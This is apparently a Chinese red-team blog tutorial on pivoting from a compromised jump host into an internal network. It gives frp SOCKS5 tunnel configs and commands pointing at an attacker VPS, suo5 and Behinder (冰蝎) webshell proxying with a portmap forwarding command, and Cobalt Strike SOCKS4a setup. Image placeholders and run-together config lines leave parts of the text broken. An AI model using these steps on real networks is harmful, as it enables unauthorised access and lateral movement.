红队技巧-跳板机出网利用

华盟君渗透测试 1月前

6.31K 0

0x00 前言

在红蓝对抗中拿到跳板机后，一般考虑的就是先搭建代理，从而对内网的资产进行测试，下面介绍几种内网代理搭建方式。

0x01 frp+profile

1、cs上线主机（也可以直接用shell工具，非必须cs上线，这里我直接用的之前的笔记，使用的是cs上线）自动草稿
2、上传frpc.exe和frc.ini到跳板机
3、vps上运行 ./frps -c frps.ini4、跳板机执行上传的frp

shell  frpc.exe -c frpc.ini

自动草稿
5、配置攻击机的proxyfile 代理服务器，地址为vps地址，端口为 frpc.ini中的remote端口
6、设置代理规则
下为frp配置frpc.ini配置如下：

[common]server_addr = vps地址server_port = 59972[socks5]type = tcpremote_port = 6012plugin_user = test（账号）plugin = socks5plugin_passwd = test（密码）

frps.ini配置如下

[common]bind_port = 59972

0x02 suo5

1、上传suo5脚本到能访问到的url路径自动草稿 2、访问可以正常解析3、目标填写能访问到的suo5.jsp地址，填写账号密码，点击连接即可4、pro配置代理服务器，地址为本地的127.0.0.1，端口选1111就行5、配置代理规则

0x03 冰蝎内网穿透模块

1、先冰蝎上马自动草稿
2、打开内网穿透模块，输入vps地址和转发流量的端口3、vps执行

./portmap  -p1 59970 -p2 4444 -m 2将本地端口 59970 的流量转发到另一个端口 4444

自动草稿 4、点击开启5、vps收到流量6、proxyfile配置代理服务器7、proxyfile配置规则

0x04 cs 上线socks4a

cs，使用socks4建立一个端口，然后pro选择vps地址和cs生产的端口，选择socks4a，然后创建服务器，然后加一条代理规则，只填写内网的地址，选择刚才创建的代理服务器即可。1、右击shell->socks server 自动草稿 2、使用socks 4a端口3、pro设置，端口为cs随机生成的sock端口，勾选socks 4a扩展4、配置代理规则